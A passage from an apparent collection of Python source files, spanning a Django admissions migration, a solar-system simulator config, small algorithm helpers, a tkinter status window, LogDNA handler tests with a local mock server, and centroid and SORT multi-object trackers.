blank=True)),\n ('school_level', models.CharField(default=None, max_length=8, null=True, verbose_name='School Level', blank=True)),\n ('major', models.CharField(default=None, max_length=16, null=True, verbose_name='Major', blank=True)),\n ('major_type', models.CharField(default=None, max_length=16, null=True, verbose_name='Major Type', blank=True)),\n ('score', models.FloatField(default=None, null=True, verbose_name='Average Score', blank=True)),\n ('gpa', models.FloatField(default=None, null=True, verbose_name='4 based GPA', blank=True)),\n ],\n ),\n migrations.CreateModel(\n name='Exam',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('exam_type', models.CharField(max_length=32, verbose_name='Exam Type')),\n ('score', models.FloatField(verbose_name='Score')),\n ('create_time', models.DateTimeField(auto_now_add=True, verbose_name='Create Time')),\n ('base_exam', models.ForeignKey(related_name='items', default=None, blank=True, to='admission.Exam', null=True)),\n ],\n options={\n 'verbose_name': 'Exam',\n },\n ),\n migrations.CreateModel(\n name='Feedback',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('create_time', models.DateTimeField(auto_now_add=True, verbose_name='Create Time')),\n ('content', models.TextField(verbose_name='Feedback Content')),\n ('source', models.CharField(default='\\u5b66\\u751f\\u5bb6\\u957f', max_length=16, verbose_name='Feedback source')),\n ],\n ),\n migrations.CreateModel(\n name='FeedbackImage',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('feedback', models.ForeignKey(related_name='images', to='admission.Feedback')),\n ],\n ),\n migrations.CreateModel(\n name='GenericImage',\n fields=[\n ('id', models.UUIDField(default=uuid.uuid4, serialize=False, editable=False, primary_key=True)),\n ('name', models.CharField(default=None, max_length=127, null=True, blank=True)),\n ('image', models.ImageField(upload_to=admission.models.rename_file)),\n ('create_time', models.DateTimeField(auto_now_add=True)),\n ],\n options={\n 'verbose_name': '\\u56fe\\u50cf',\n },\n ),\n migrations.CreateModel(\n name='Offer',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('project', models.CharField(default=None, max_length=255, null=True, verbose_name='Project', blank=True)),\n ('year', models.IntegerField(default=2016, null=True, verbose_name='Year', blank=True)),\n ('season', models.CharField(default=None, max_length=8, null=True, verbose_name='Season', blank=True)),\n ('major', models.CharField(default=None, max_length=255, null=True, verbose_name='Major', blank=True)),\n ('major_english_name', models.CharField(default=None, max_length=255, null=True, verbose_name='English Name of Major', blank=True)),\n ('major_type', models.CharField(default=None, max_length=255, null=True, verbose_name='Major Type', blank=True)),\n ('degree', models.CharField(default=None, max_length=8, null=True, verbose_name='Degree', blank=True)),\n ('scholarship', models.IntegerField(default=None, null=True, verbose_name='Scholarship', blank=True)),\n ('received_time', models.DateField(default=datetime.date.today, null=True, verbose_name='Offer Received Date', blank=True)),\n ('offer_type', models.CharField(default=None, max_length=16, null=True, verbose_name='Offer Type', blank=True)),\n ('is_admitted', models.BooleanField(default=True, 
verbose_name='Is Admitted')),\n ('is_chosen', models.BooleanField(default=False, verbose_name='Is Chosen')),\n ('publish_status', models.IntegerField(default=0, verbose_name='Publish Status')),\n ('offer_image', models.ForeignKey(default=None, blank=True, to='admission.GenericImage', null=True, verbose_name='Offer Image')),\n ],\n options={\n 'verbose_name': 'Offer',\n },\n ),\n migrations.CreateModel(\n name='School',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('english_name', models.CharField(max_length=255, verbose_name='English Name')),\n ('chinese_name', models.CharField(max_length=255, verbose_name='Chinese Name')),\n ('country', models.CharField(max_length=32, verbose_name='Country')),\n ('badge', models.ForeignKey(default=None, blank=True, to='admission.GenericImage', null=True, verbose_name='Badge')),\n ],\n options={\n 'verbose_name': 'School Info',\n },\n ),\n migrations.CreateModel(\n name='Student',\n fields=[\n ('id', models.UUIDField(default=uuid.uuid4, serialize=False, editable=False, primary_key=True)),\n ('name', models.CharField(max_length=127, verbose_name='Student Name')),\n ('country', models.CharField(default=None, max_length=32, null=True, verbose_name='Country', blank=True)),\n ('city', models.CharField(default=None, max_length=127, null=True, verbose_name='City', blank=True)),\n ('degree', models.CharField(default=None, max_length=8, null=True, verbose_name='Highest Degree', blank=True)),\n ('source', models.CharField(max_length=8, verbose_name='Admission Source')),\n ('advisor', models.IntegerField(default=None, null=True, verbose_name='Advisor UID', blank=True)),\n ('create_time', models.DateTimeField(auto_now_add=True, verbose_name='Create Time')),\n ],\n options={\n 'verbose_name': 'Student Info',\n },\n ),\n migrations.CreateModel(\n name='WorkingExperience',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('company', models.CharField(max_length=225, verbose_name='Company')),\n ('occupation', models.CharField(default=None, max_length=127, null=True, verbose_name='Occupation', blank=True)),\n ('occupation_type', models.CharField(default=None, max_length=127, null=True, verbose_name='Occupation Type', blank=True)),\n ('detail', models.TextField(default=None, null=True, verbose_name='Experience Detail', blank=True)),\n ('from_date', models.DateField(verbose_name='From Date')),\n ('to_date', models.DateField(default=None, null=True, verbose_name='To Date', blank=True)),\n ('student', models.ForeignKey(related_name='working_experience', to='admission.Student')),\n ],\n options={\n 'verbose_name': 'Working Experience',\n },\n ),\n migrations.AddField(\n model_name='offer',\n name='school',\n field=models.ForeignKey(related_name='school', to='admission.School'),\n ),\n migrations.AddField(\n model_name='offer',\n name='student',\n field=models.ForeignKey(related_name='offers', to='admission.Student'),\n ),\n migrations.AddField(\n model_name='feedbackimage',\n name='image',\n field=models.ForeignKey(to='admission.GenericImage'),\n ),\n migrations.AddField(\n model_name='feedback',\n name='student',\n field=models.ForeignKey(related_name='feedback', to='admission.Student'),\n ),\n migrations.AddField(\n model_name='exam',\n name='student',\n field=models.ForeignKey(related_name='exams', to='admission.Student'),\n ),\n migrations.AddField(\n model_name='educationalhistory',\n name='student',\n 
field=models.ForeignKey(related_name='educational_history', to='admission.Student'),\n ),\n migrations.AddField(\n model_name='admission',\n name='student',\n field=models.OneToOneField(related_name='admission', to='admission.Student'),\n ),\n migrations.AlterUniqueTogether(\n name='exam',\n unique_together=set([('student', 'base_exam')]),\n ),\n migrations.AlterUniqueTogether(\n name='educationalhistory',\n unique_together=set([('student', 'degree')]),\n ),\n ]\n","sub_path":"admission/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":12155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"629250974","text":"import configparser\nimport argparse\nimport textwrap\nfrom space_body import SpaceBody\n\n\nclass Config:\n width = 0\n height = 0\n stars = 0\n display = (0, 0)\n stopOnCollision = True\n star_colors = []\n generators = []\n\n def __init__(self):\n parser = argparse.ArgumentParser(description='Solar mechanics simulator',\n formatter_class=argparse.RawDescriptionHelpFormatter,\n epilog=textwrap.dedent('\\ '))\n\n parser.add_argument('-f', '--file',\n dest='file',\n default='config.ini',\n help='configuration file')\n\n args = parser.parse_args()\n\n self.config = configparser.ConfigParser()\n self.config.read(args.file)\n\n sys = self.config['System']\n self.width = int(sys.get(\"WIN_WIDTH\", 800))\n self.height = int(sys.get(\"WIN_HEIGHT\", 640))\n self.stars = int(sys.get(\"STAR_NUM\", 10))\n\n self.display = (self.width, self.height)\n\n colors = sys.get(\"STAR_COLORS\")\n self.star_colors = colors.split(',')\n\n self.space_color = sys.get(\"SPACE_COLOR\")\n\n self.onCollision = sys.get(\"ON_COLLISION\", \"stop\")\n\n gens = sys.get(\"GENERATORS\")\n\n if gens is not None:\n self.generators = gens.split(',')\n\n def get_system(self):\n s = []\n\n for i in self.config.sections():\n if i != \"System\" and not (i in set(self.generators)):\n obj = SpaceBody(i,\n int(self.config[i][\"Mass\"]),\n float(self.config[i][\"X\"]),\n float(self.config[i][\"Y\"]),\n float(self.config[i][\"VX\"]),\n float(self.config[i][\"VY\"]))\n\n obj.set_view_model(int(self.config[i][\"R\"]),\n self.config[i][\"color\"],\n self.space_color)\n\n s.append(obj)\n return s\n\n def get_display(self):\n return self.display\n\n def get_width(self):\n return self.width\n\n def get_height(self):\n return self.height\n\n def get_stars(self):\n return self.stars\n\n def get_star_colors(self):\n return self.star_colors\n\n def get_space_color(self):\n return self.space_color\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"49246543","text":"class Interval(object):\n\tdef __init__(self, s=0, e=0):\n\t\tself.start = s\n\t\tself.end = e\n\n\tdef __str__(self):\n\t\treturn \"[\" + str(self.start) + \",\" + str(self.end) + \"]\"\n\nclass Solution(object):\n\tdef merge(self, intervals):\n\t\tresult = []\n\t\tif not intervals:\n\t\t\treturn result\n\t\tintervals.sort(key = lambda x: x.start)\n\t\tresult.append(intervals[0])\n\t\tfor interval in intervals[1:]:\n\t\t\tprev = result[-1]\n\t\t\tif prev.end >= interval.start:\n\t\t\t\tprev.end = max(prev.end, interval.end)\n\t\t\telse:\n\t\t\t\tresult.append(interval)\n\t\treturn result
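\n\n# [editor's note] usage sketch for merge() above (hypothetical values):\n#   ivs = [Interval(1, 3), Interval(2, 6), Interval(8, 10)]\n#   merged = Solution().merge(ivs)   # -> intervals [1,6] and [8,10]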
result\n\t\t\n","sub_path":"Part1/Merge_Intervals.py","file_name":"Merge_Intervals.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"451824135","text":"# Codificacion y decodificacion de una tabla de Nf filas y Nc columnas\r\n\r\ndef codifica(f, c, Nf, Nc):\r\n # Funcion que codifica la fila f y columna c\r\n assert ((f >= 0) and (f <= Nf - 1)),\"Fila incorrecta! Debe ser un numero entre 0 y {}\".format(Nf)\r\n assert ((c >= 0) and (c <= Nc - 1)),\"Columna incorrecta! Debe ser un numero entre 0 y {}\".format(Nc)\r\n n = Nc * f + c\r\n # print(u'Número a codificar:', n)\r\n return n\r\n\r\ndef decodifica(x, Nf, Nc):\r\n # Funcion que codifica un caracter en su respectiva fila f y columna c de la tabla\r\n n = x\r\n assert((n >= 0) and (n <= Nf * Nc - 1)), 'Caracter incorrecto! Debe estar entre 0 y {0}, se recibio {1}'.format(Nf * Nc - 1,n)\r\n f = int(n / Nc)\r\n c = n % Nc\r\n return f, c\r\n\r\ndef codifica3(f, c, o, Nf, Nc, No):\r\n # Funcion que codifica la fila f, columna c, y objeto o\r\n # print('f : '+str(f))\r\n # print('c : '+str(c))\r\n # print('o : '+str(o))\r\n # print('Nf: '+str(Nf))\r\n # print('Nc: '+str(Nc))\r\n # print('No: '+str(No))\r\n assert((f >= 0) and (f <= Nf - 1)), \"Fila incorrecta! Debe ser un numero entre 0 y {}\".format(str(Nf - 1))\r\n assert((c >= 0) and (c <= Nc - 1)), \"Columna incorrecta! Debe ser un numero entre 0 y {}\".format(str(Nc - 1))\r\n assert((o >= 0) and (o <= No - 1)), \"Fila incorrecta! Debe ser un numero entre 0 y {}\".format(str(No - 1))\r\n v1 = codifica(f, c, Nf, Nc)\r\n v2 = codifica(v1, o , Nf * Nc, No)\r\n# print(f'({f},{c},{o})->{v2}')\r\n return v2\r\n\r\ndef decodifica3(x, Nf, Nc, No):\r\n # Funcion que codifica un caracter en su respectiva fila f, columna c y objeto o\r\n # print('x : '+str(x))\r\n # print('Nf: '+str(Nf))\r\n # print('Nc: '+str(Nc))\r\n # print('No: '+str(No))\r\n v1, o = decodifica(x, Nf * Nc, No)\r\n f, c = decodifica(v1, Nf, Nc)\r\n# print(f'{x}->({f},{c},{o})')\r\n return f, c, o\r\n\r\ndef deco_dict3(I:dict,Ncuadros:int,Ncolores:int,Nturnos:int):\r\n keys = I.keys()\r\n deco_list = []\r\n for i in keys:\r\n# print(\"i : \"+i)\r\n# print('Ni: '+str(Ncuadros))\r\n# print('Nj: '+str(Ncolores))\r\n# print('Nk: '+str(Nturnos))\r\n cud,col,tur = decodifica3(ord(i)- 256,Ncuadros,Ncolores,Nturnos)\r\n lis = [cud,col,tur,I[i]]\r\n # str = \"{}-{}-{}-{}\".format(tur,cud,col,I[i])\r\n deco_list.append(lis)\r\n return deco_list\r\n","sub_path":"Main/codificacion.py","file_name":"codificacion.py","file_ext":"py","file_size_in_byte":2340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"307269001","text":"import tkinter as tk\nimport subprocess\n\n\nclass StatusWindow(tk.Frame):\n subprocesses = {}\n\n def create_part(self, row, title, process):\n label = tk.Label(self, text=title)\n label.grid(row=row, column=0)\n\n label = tk.Label(self, text=' ', bg='red')\n label.grid(row=row, column=1, padx=10)\n self.status[row] = label\n\n def spawn_proc(port):\n self.subprocesses[row] = subprocess.Popen(['python3', process, str(port)])\n\n button = tk.Button(self, text='Start', command=lambda: spawn_proc(self.port.get()))\n button.grid(row=row, column=2)\n\n button = tk.Button(self, text='Stop', command=lambda: self.subprocesses[row].terminate())\n button.grid(row=row, column=3)\n\n def __init__(self, master=None):\n super().__init__(master)\n self.pack()\n self.status = {}\n\n label 
= tk.Label(self, text='Port:')\n label.grid(row=0, column=0)\n self.port = tk.IntVar()\n entry = tk.Entry(self, textvariable=self.port)\n entry.grid(row=0, column=1, columnspan=2)\n\n self.create_part(1, 'Driver', 'ls350driver.py')\n self.create_part(2, 'Acquirer', 'ls350acquirer.py')\n self.create_part(3, 'Data Store', 'data_store.py')\n self.create_part(4, 'Recorder', 'recorder.py')\n self.create_part(5, 'Controller', 'controller.py')\n self.create_part(6, 'Front End', 'frontend.py')\n self.check_status()\n\n def check_status(self):\n for key, proc in self.subprocesses.items():\n if proc.poll() is None:\n self.status[key].configure(background='green')\n else:\n self.status[key].configure(background='red')\n\n root.after(100, self.check_status)\n\n\nif __name__ == '__main__':\n root = tk.Tk()\n sw = StatusWindow(root)\n root.mainloop()\n","sub_path":"instrument_example/status.py","file_name":"status.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"128853886","text":"import json\nimport unittest\n\nfrom http.server import BaseHTTPRequestHandler\nfrom logdna import LogDNAHandler\nfrom .mock.server import get_port, start_server\nfrom .mock.log import logger, info, LOGDNA_API_KEY\n\nexpectedLines = []\n\n\nclass SuccessfulRequestHandler(BaseHTTPRequestHandler):\n def do_POST(self):\n content_length = int(self.headers['Content-Length'])\n body = self.rfile.read(content_length)\n self.send_response(200)\n\n self.end_headers()\n body = json.loads(body)['ls']\n for keys in body:\n expectedLines.append(keys['line'])\n\n\nclass FailedRequestHandler(BaseHTTPRequestHandler):\n def do_POST(self):\n content_length = int(self.headers['Content-Length'])\n self.rfile.read(content_length)\n self.send_response(400)\n self.end_headers()\n\n\nclass LogDNAHandlerTest(unittest.TestCase):\n def server_recieves_messages(self):\n port = get_port()\n options = {\n 'hostname': 'localhost',\n 'url': 'http://localhost:{0}'.format(port),\n 'ip': '10.0.1.1',\n 'mac': 'C0:FF:EE:C0:FF:EE'\n }\n\n handler = LogDNAHandler(LOGDNA_API_KEY, options)\n logger.addHandler(handler)\n line = \"python python python\"\n\n server_thread = start_server(port, SuccessfulRequestHandler)\n logdna_thread = info(line)\n\n server_thread.join()\n logdna_thread.join()\n\n self.assertEqual(len(expectedLines), 1)\n self.assertIn(line, expectedLines)\n logger.removeHandler(handler)\n\n def messages_preserved_if_excp(self):\n port = get_port()\n options = {\n 'hostname': 'localhost',\n 'url': 'http://localhost:{0}'.format(port),\n 'ip': '10.0.1.1',\n 'mac': 'C0:FF:EE:C0:FF:EE'\n }\n\n handler = LogDNAHandler(LOGDNA_API_KEY, options)\n logger.addHandler(handler)\n line = \"second test. server fails\"\n\n server_thread = start_server(port, FailedRequestHandler)\n logdna_thread = info(line)\n\n server_thread.join()\n logdna_thread.join()\n\n self.assertEqual(len(handler.buf), 1)\n logger.removeHandler(handler)\n\n def stops_retention_when_buf_is_full(self):\n port = get_port()\n options = {\n 'hostname': 'localhost',\n 'url': 'http://localhost:{0}'.format(port),\n 'ip': '10.0.1.1',\n 'mac': 'C0:FF:EE:C0:FF:EE',\n 'buf_retention_limit': 50,\n 'equest_timeout': 10,\n 'flush_interval': 1,\n 'retry_interval_secs': 1\n }\n\n handler = LogDNAHandler(LOGDNA_API_KEY, options)\n logger.addHandler(handler)\n line = \"when buffer grows bigger than we want\"\n lineTwo = \"when buffer grows bigger than we want. 
And more and more\"\n\n server_thread = start_server(port, FailedRequestHandler)\n logdna_thread = info(line, lineTwo)\n\n server_thread.join()\n logdna_thread.join()\n\n self.assertEqual(len(handler.buf), 1)\n self.assertNotEqual(handler.buf[0]['line'], lineTwo)\n logger.removeHandler(handler)\n\n def test_run_tests(self):\n self.server_recieves_messages()\n self.messages_preserved_if_excp()\n self.stops_retention_when_buf_is_full()\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_logger.py","file_name":"test_logger.py","file_ext":"py","file_size_in_byte":3357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"353656367","text":"##usage : python mot_eval.py\r\n\r\nfrom __future__ import print_function\r\nfrom scipy.spatial import distance as dist\r\nfrom collections import OrderedDict\r\n#import imutils\r\nimport time\r\nimport cv2\r\nimport numpy as np\r\nimport glob\r\nfrom tqdm import tqdm\r\nimport pandas as pd\r\nimport argparse\r\n\r\nfrom yolov5_inference import yolo_detector\r\nfrom utils.torch_utils import time_synchronized, select_device\r\nfrom models.experimental import attempt_load\r\n\r\nap = argparse.ArgumentParser()\r\nap.add_argument(\"-w\", \"--weights\", type=str, default='best.pt', help='model.pt path(s)')\r\nap.add_argument(\"-i\", \"--img\", type=int, default= 1024, help='image size to prediction')\r\nap.add_argument(\"-d\", \"--inp\", type=str, default='input/images1', help='Input directory')\r\nap.add_argument(\"-l\", \"--lab\", type=str, default='input/labels1', help='Labels directory')\r\nargs = vars(ap.parse_args())\r\n\r\n########################\r\n####### ALERT ############\r\n########################\r\n###SELECT THIS FIRST\r\n\r\n#tracker = \"euclidean\"\r\ntracker = \"sort\"\r\n\r\n\r\nclass EuclideanTracker():\r\n \r\n def __init__(self, maxDisappeared=50): ##by default it was 50\r\n # initialize the next unique object ID along with two ordered\r\n # dictionaries used to keep track of mapping a given object\r\n # ID to its centroid and number of consecutive frames it has\r\n # been marked as \"disappeared\", respectively\r\n self.nextObjectID = 0\r\n self.objects = OrderedDict()\r\n self.boundingBoxes = OrderedDict()\r\n self.trajectory = OrderedDict()\r\n self.disappeared = OrderedDict()\r\n # store the number of maximum consecutive frames a given\r\n # object is allowed to be marked as \"disappeared\" until we\r\n # need to deregister the object from tracking\r\n self.maxDisappeared = maxDisappeared\r\n \r\n \r\n def register(self, centroid, boundingBox):\r\n # when registering an object we use the next available object\r\n # ID to store the centroid\r\n self.objects[self.nextObjectID] = centroid\r\n self.boundingBoxes[self.nextObjectID] = boundingBox\r\n self.trajectory[self.nextObjectID] = list([centroid])\r\n self.disappeared[self.nextObjectID] = 0\r\n self.nextObjectID += 1\r\n \r\n \r\n def deregister(self, objectID):\r\n # to deregister an object ID we delete the object ID from\r\n # both of our respective dictionaries\r\n del self.objects[objectID]\r\n del self.boundingBoxes[objectID]\r\n del self.trajectory[objectID]\r\n del self.disappeared[objectID]\r\n \r\n \r\n def update(self, rects):\r\n # check to see if the list of input bounding box rectangles\r\n # is empty\r\n if len(rects) == 0:\r\n # loop over any existing tracked objects and mark them\r\n # as disappeared\r\n for objectID in list(self.disappeared.keys()):\r\n self.disappeared[objectID] += 1\r\n # if we 
have reached a maximum number of consecutive\r\n # frames where a given object has been marked as\r\n # missing, deregister it\r\n if self.disappeared[objectID] > self.maxDisappeared:\r\n self.deregister(objectID)\r\n # return early as there are no centroids or tracking info\r\n # to update\r\n return self.objects\r\n \r\n # initialize an array of input centroids for the current frame\r\n inputCentroids = np.zeros((len(rects), 2), dtype=\"int\")\r\n # loop over the bounding box rectangles\r\n for (i, (startX, startY, endX, endY)) in enumerate(rects):\r\n # use the bounding box coordinates to derive the centroid\r\n cX = int((startX + endX) / 2.0)\r\n cY = int((startY + endY) / 2.0)\r\n inputCentroids[i] = (cX, cY)\r\n \r\n # if we are currently not tracking any objects take the input\r\n # centroids and register each of them\r\n if len(self.objects) == 0:\r\n for i in range(0, len(inputCentroids)):\r\n self.register(inputCentroids[i], rects[i])\r\n \r\n # otherwise, are are currently tracking objects so we need to\r\n # try to match the input centroids to existing object\r\n # centroids\r\n else:\r\n # grab the set of object IDs and corresponding centroids\r\n objectIDs = list(self.objects.keys())\r\n objectCentroids = list(self.objects.values())\r\n # compute the distance between each pair of object\r\n # centroids and input centroids, respectively -- our\r\n # goal will be to match an input centroid to an existing\r\n # object centroid\r\n D = dist.cdist(np.array(objectCentroids), inputCentroids)\r\n # in order to perform this matching we must (1) find the\r\n # smallest value in each row and then (2) sort the row\r\n # indexes based on their minimum values so that the row\r\n # with the smallest value is at the *front* of the index\r\n # list\r\n rows = D.min(axis=1).argsort()\r\n # next, we perform a similar process on the columns by\r\n # finding the smallest value in each column and then\r\n # sorting using the previously computed row index list\r\n cols = D.argmin(axis=1)[rows]\r\n \r\n # in order to determine if we need to update, register,\r\n # or deregister an object we need to keep track of which\r\n # of the rows and column indexes we have already examined\r\n usedRows = set()\r\n usedCols = set()\r\n # loop over the combination of the (row, column) index\r\n # tuples\r\n for (row, col) in zip(rows, cols):\r\n # if we have already examined either the row or\r\n # column value before, ignore it\r\n # val\r\n if row in usedRows or col in usedCols:\r\n continue\r\n # otherwise, grab the object ID for the current row,\r\n # set its new centroid, and reset the disappeared\r\n # counter\r\n objectID = objectIDs[row]\r\n self.objects[objectID] = inputCentroids[col]\r\n self.boundingBoxes[objectID] = rects[col]\r\n self.trajectory[objectID].append(inputCentroids[col])\r\n self.disappeared[objectID] = 0\r\n # indicate that we have examined each of the row and\r\n # column indexes, respectively\r\n usedRows.add(row)\r\n usedCols.add(col)\r\n \r\n # compute both the row and column index we have NOT yet\r\n # examined\r\n unusedRows = set(range(0, D.shape[0])).difference(usedRows)\r\n unusedCols = set(range(0, D.shape[1])).difference(usedCols)\r\n \r\n # in the event that the number of object centroids is\r\n # equal or greater than the number of input centroids\r\n # we need to check and see if some of these objects have\r\n # potentially disappeared\r\n if D.shape[0] >= D.shape[1]:\r\n # loop over the unused row indexes\r\n for row in unusedRows:\r\n # grab the object ID for the 
corresponding row\r\n # index and increment the disappeared counter\r\n objectID = objectIDs[row]\r\n self.disappeared[objectID] += 1\r\n # check to see if the number of consecutive\r\n # frames the object has been marked \"disappeared\"\r\n # for warrants deregistering the object\r\n if self.disappeared[objectID] > self.maxDisappeared:\r\n self.deregister(objectID)\r\n \r\n # otherwise, if the number of input centroids is greater\r\n # than the number of existing object centroids we need to\r\n # register each new input centroid as a trackable object\r\n else:\r\n for col in unusedCols:\r\n self.register(inputCentroids[col], rects[col])\r\n # return the set of trackable objects\r\n return self.objects, self.trajectory, self.boundingBoxes\r\n\r\n\r\n\r\n\r\nfrom numba import jit\r\nimport os.path\r\n\r\nfrom scipy.optimize import linear_sum_assignment\r\nimport glob\r\nimport time\r\nimport argparse\r\nfrom filterpy.kalman import KalmanFilter\r\nfrom collections import OrderedDict\r\n\r\nfrom tqdm import tqdm\r\nimport pandas as pd\r\n\r\n\r\ndef iou(bb_test,bb_gt):\r\n \"\"\"\r\n Computes IOU between two bboxes in the form [x1,y1,x2,y2]\r\n \"\"\"\r\n xx1 = np.maximum(bb_test[0], bb_gt[0])\r\n yy1 = np.maximum(bb_test[1], bb_gt[1])\r\n xx2 = np.minimum(bb_test[2], bb_gt[2])\r\n yy2 = np.minimum(bb_test[3], bb_gt[3])\r\n w = np.maximum(0., xx2 - xx1)\r\n h = np.maximum(0., yy2 - yy1)\r\n wh = w * h\r\n o = wh / ((bb_test[2]-bb_test[0])*(bb_test[3]-bb_test[1])\r\n + (bb_gt[2]-bb_gt[0])*(bb_gt[3]-bb_gt[1]) - wh)\r\n return(o)\r\n\r\ndef colinearity(det,hist):\r\n #det - current detection\r\n #hist - last 2 mean detections\r\n \r\n dims = det[2:4] - det[:2]\r\n diag = np.sqrt(sum(dims**2))\r\n a = det[:2] + dims/2 - hist[-2]\r\n b = hist[-1] - hist[-2]\r\n len1 = np.sqrt(sum(a*a))\r\n len2 = np.sqrt(sum(b*b))\r\n ratio = len2/float(len1)\r\n maxdist = diag*(min(dims)/max(dims)+1)\r\n maxval = b.dot(b)\r\n a *= ratio\r\n return a.dot(b)/float(maxval) if maxval and maxdist > len1 else 0\r\n\r\ndef convert_bbox_to_z(bbox):\r\n \"\"\"\r\n Takes a bounding box in the form [x1,y1,x2,y2] and returns z in the form\r\n [x,y,s,r] where x,y is the centre of the box and s is the scale/area and r is\r\n the aspect ratio\r\n \"\"\"\r\n w = bbox[2]-bbox[0]\r\n h = bbox[3]-bbox[1]\r\n x = bbox[0]+w/2.\r\n y = bbox[1]+h/2.\r\n s = w*h #scale is just area\r\n r = w/float(h)\r\n return np.array([x,y,s,r]).reshape((4,1))\r\n\r\ndef convert_x_to_bbox(x,score=None):\r\n \"\"\"\r\n Takes a bounding box in the centre form [x,y,s,r] and returns it in the form\r\n [x1,y1,x2,y2] where x1,y1 is the top left and x2,y2 is the bottom right\r\n \"\"\"\r\n w = np.sqrt(x[2]*x[3])\r\n h = x[2]/w\r\n if(score==None):\r\n return np.array([x[0]-w/2.,x[1]-h/2.,x[0]+w/2.,x[1]+h/2.]).reshape((1,4))\r\n else:\r\n return np.array([x[0]-w/2.,x[1]-h/2.,x[0]+w/2.,x[1]+h/2.,score]).reshape((1,5))\r\n \r\n\r\n\r\nclass KalmanBoxTracker(object):\r\n \"\"\"\r\n This class represents the internel state of individual tracked objects observed as bbox.\r\n \"\"\"\r\n count = 0\r\n \r\n def __init__(self,bbox):\r\n \"\"\"\r\n Initialises a tracker using initial bounding box.\r\n \"\"\"\r\n #define constant velocity model\r\n self.kf = KalmanFilter(dim_x=7, dim_z=4)\r\n self.kf.F = np.array([[1,0,0,0,1,0,0],[0,1,0,0,0,1,0],[0,0,1,0,0,0,1],[0,0,0,1,0,0,0], [0,0,0,0,1,0,0],[0,0,0,0,0,1,0],[0,0,0,0,0,0,1]])\r\n self.kf.H = np.array([[1,0,0,0,0,0,0],[0,1,0,0,0,0,0],[0,0,1,0,0,0,0],[0,0,0,1,0,0,0]])\r\n\r\n self.kf.R[2:,2:] *= 10.\r\n self.kf.P[4:,4:] 
*= 1000. #give high uncertainty to the unobservable initial velocities\r\n self.kf.P *= 10.\r\n self.kf.Q[-1,-1] *= 0.01\r\n self.kf.Q[4:,4:] *= 0.01\r\n\r\n self.kf.x[:4] = convert_bbox_to_z(bbox)\r\n self.time_since_update = 0\r\n self.id = KalmanBoxTracker.count\r\n KalmanBoxTracker.count += 1\r\n self.history = []\r\n self.hits = 0\r\n self.hit_streak = 0\r\n self.age = 0\r\n self.cthist = [self.kf.x[:2].ravel()]\r\n\r\n def update(self, bbox, n):\r\n \"\"\"\r\n Updates the state vector with observed bbox.\r\n \"\"\"\r\n self.time_since_update = 0\r\n self.history = []\r\n self.hits += 1\r\n self.hit_streak += 1\r\n self.kf.update(convert_bbox_to_z(bbox))\r\n self.cthist.append(bbox[:2] + (bbox[2:4] - bbox[:2]) / 2)\r\n self.cthist = self.cthist[-n:]\r\n\r\n def predict(self):\r\n \"\"\"\r\n Advances the state vector and returns the predicted bounding box estimate.\r\n \"\"\"\r\n if((self.kf.x[6]+self.kf.x[2])<=0):\r\n self.kf.x[6] *= 0.0\r\n self.kf.predict()\r\n self.age += 1\r\n if(self.time_since_update>0):\r\n self.hit_streak = 0\r\n self.kf.P *= 1.2 # we may be lost, increase uncertainty and responsiveness\r\n self.time_since_update += 1\r\n self.history.append(convert_x_to_bbox(self.kf.x))\r\n return self.history[-1]\r\n\r\n def get_state(self):\r\n \"\"\"\r\n Returns the current bounding box estimate.\r\n \"\"\"\r\n return convert_x_to_bbox(self.kf.x)\r\n \r\n\r\n \r\n \r\ndef associate_detections_to_trackers(detections, trackers, cost_fn = iou, threshold = 0.3): ##less th gives better score\r\n \"\"\"\r\n Assigns detections to tracked object (both represented as bounding boxes)\r\n Returns 3 lists of matches, unmatched_detections and unmatched_trackers\r\n \"\"\"\r\n lendet = len(detections)\r\n lentrk = len(trackers)\r\n\r\n if(lentrk==0):\r\n return np.empty((0,2),dtype=int), np.arange(lendet), np.array([],dtype=int)\r\n cost_matrix = np.zeros((lendet,lentrk),dtype=np.float32)\r\n\r\n for d,det in enumerate(detections):\r\n for t,trk in enumerate(trackers):\r\n cost_matrix[d,t] = cost_fn(det,trk)\r\n cost_matrix[cost_matrix < threshold] = 0.\r\n matched_indices = linear_sum_assignment(-cost_matrix) \r\n matched_indices = np.asarray(matched_indices)\r\n matched_indices = np.transpose(matched_indices)\r\n\r\n costs = cost_matrix[tuple(matched_indices.T)] # select values from cost matrix by matched indices\r\n matches = matched_indices[np.where(costs)[0]] # remove zero values from matches\r\n unmatched_detections = np.where(np.in1d(range(lendet), matches[:,0], invert=True))[0]\r\n unmatched_trackers = np.where(np.in1d(range(lentrk), matches[:,1], invert=True))[0]\r\n\r\n if(len(matches)==0):\r\n matches = np.empty((0,2),dtype=int)\r\n\r\n return matches, unmatched_detections, unmatched_trackers\r\n\r\n\r\n\r\nclass SortTracker(object):\r\n def __init__(self,max_age=10,min_hits=0):\r\n \"\"\"\r\n Sets key parameters for SORT\r\n \"\"\"\r\n self.max_age = max_age\r\n self.min_hits = min_hits\r\n self.trackers = []\r\n self.frame_count = 0\r\n self.trajectory = 